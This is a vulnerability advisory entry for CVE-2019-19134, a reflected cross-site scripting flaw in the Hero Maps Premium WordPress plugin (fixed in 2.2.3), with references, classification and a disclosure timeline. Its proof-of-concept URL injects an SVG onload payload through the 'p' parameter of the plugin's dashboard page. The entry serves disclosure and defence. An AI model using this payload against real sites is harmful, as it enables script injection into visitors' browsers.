Hero Maps Premium < 2.2.3 - Unauthenticated Reflected Cross-Site Scripting (XSS)

Proof of Concept
http://example.com/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3E%3Csvg//onload=%22alert(%27XSS%20in%20Hero%20Maps%20Premium%202.1.6%27)%22%3E

Affects Plugin

Hero Maps Premium (fixed in version 2.2.3)

References

CVE: CVE-2019-19134
URL: https://www.hooperlabs.xyz/disclosures/cve-2019-19134.php
URL: https://heroplugins.com/changelogs/hmaps/changelog.txt

Classification

Type: XSS
OWASP Top 10: A7: Cross-Site Scripting (XSS)
CWE: CWE-79

Miscellaneous

Original Researcher: Hooper Labs
Views: 2673
Verified: No
WPVDB ID: 10095

Timeline

Publicly Published: 2020-02-25
Added: 2020-02-26
Last Updated: 2020-02-27